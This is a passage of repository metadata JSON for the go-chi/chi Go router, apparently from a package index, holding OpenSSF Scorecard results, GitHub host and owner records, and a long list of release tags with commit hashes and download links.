policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v2.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v2.1.1/manifests"},{"name":"v1.5.5","sha":"bbb989dcdf2943dd4cc8bc3381057cb632d1e73e","kind":"commit","published_at":"2023-09-07T09:35:12.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.5","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.5/manifests"},{"name":"v5.0.10","sha":"99bc99e0bf0edc147e82765f2848167922a5c644","kind":"commit","published_at":"2023-07-13T16:01:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.10","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.10/manifests"},{"name":"v5.0.9","sha":"cfd6c464dacfc6199e3f6155faf9cb3e57be0a95","kind":"commit","published_at":"2023-07-13T15:37:56.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.9","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.9/manifests"},{"name":"v5.0.8","sha":"da69873df486639c64f3b1f90abf69c943c17554","kind":"commit","published_at":"2022-12-07T13:23:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.8","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.8/manifests"},{"name":"v5.0.7","sha":"0316d5a1df8598eceb137f5f77945be56810b564","kind":"commit","published_at":"2021-11-18T21:56:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.7","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.7/manifests"},{"name":"v5.0.6","sha":"66d6a4d9814d8d8a3816c730e18f5219f263412b","kind":"commit","published_at":"2021-11-15T21:30:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.6","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.6/manifests"},{"name":"v5.0.5","sha":"b9a8b9d0a092f57ce4ca3896c40ea36e482c9b6c","kind":"commit","published_at":"2021-10-27T11:12:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.5/manifests"},{"name":"v5.0.4","sha":"181551d0e5acd337ac7be6f4b7f71e9151c969dc","kind":"commit","published_at":"2021-08-29T14:34:40.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.4/manifests"},{"name":"v5.0.3","sha":"f16f8704ccc32f63fbc20eb364c41050cf339860","kind":"commit","published_at":"2021-04-29T22:40:05.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.3/manifests"},{"name":"v5.0.2","sha":"2283e4951adbd82c8f6427117bd6b2a1c315e725","kind":"commit","published_at":"2021-03-25T13:04:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.2/manifests"},{"name":"v5.0.1","sha":"5086f887c59f4c582f871e1de651b6e62e51c377","kind":"commit","published_at":"2021-03-10T12:43:23.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.1/manifests"},{"name":"v5.0.0","sha":"fe3708ee6c7bf30623c33ca1b8005182c392ff3f","kind":"commit","published_at":"2021-02-28T00:11:55.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.0/manifests"},{"name":"v1.5.4","sha":"c9e87efe9691a63d6a89de8bbd16b04fe4d6640e","kind":"commit","published_at":"2021-02-27T20:52:54.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.4","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.4/manifests"},{"name":"v1.5.3","sha":"7ea741287f73376032e7d4fee8fd6e371313bfa7","kind":"commit","published_at":"2021-02-21T20:28:20.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.3","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.3/manifests"},{"name":"v1.5.2","sha":"e3bfca4f25703c66c9347e2a430dd88e3198b5f7","kind":"commit","published_at":"2021-02-10T19:44:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.2","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.2/manifests"},{"name":"v1.5.1","sha":"f61ec8cf7c33c662ca78b6b2aac0e68f4729dfd6","kind":"commit","published_at":"2020-12-06T18:50:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.1","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.1/manifests"},{"name":"v1.5.0","sha":"b6287654fc97544b16619d9c6284b0d90d6b2289","kind":"commit","published_at":"2020-11-12T22:54:47.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v1.5.0","html_url":"https://github.com/go-chi/chi/releases/tag/v1.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v1.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v1.5.0/manifests"},{"name":"v4.1.2","sha":"86f9a6e7ce9bf453eaa339b51f88f586edbccbc1","kind":"commit","published_at":"2020-06-02T19:02:25.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.2/manifests"},{"name":"v4.1.1","sha":"1fafc30c1d76663042337e150b02fbacdce3466c","kind":"commit","published_at":"2020-04-16T12:17:06.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.1/manifests"},{"name":"v4.1.0","sha":"183768ed5df7d0b039500727c380bfbaf9229c81","kind":"commit","published_at":"2020-04-01T19:42:39.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.0/manifests"},{"name":"v4.0.4","sha":"1f2d16707ca3418c2bd151747b5059387fa088ba","kind":"commit","published_at":"2020-03-24T15:11:21.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.4","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.4/manifests"},{"name":"v4.0.3","sha":"2db61557f36b2f4caa20ce6ef50e98bac0f7fce5","kind":"commit","published_at":"2020-01-09T22:01:35.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.0.3/manifests"},{"name":"v4.0.2","sha":"da24bba8dcd4021cafac38724bf10dccc97c3e36","kind":"commit","published_at":"2019-02-26T16:20:03.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.0.2","html_url":"https://github.com/go-chi/chi/releases/tag/v4.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.0.2","tag_url":"https://repos.ecosyste.m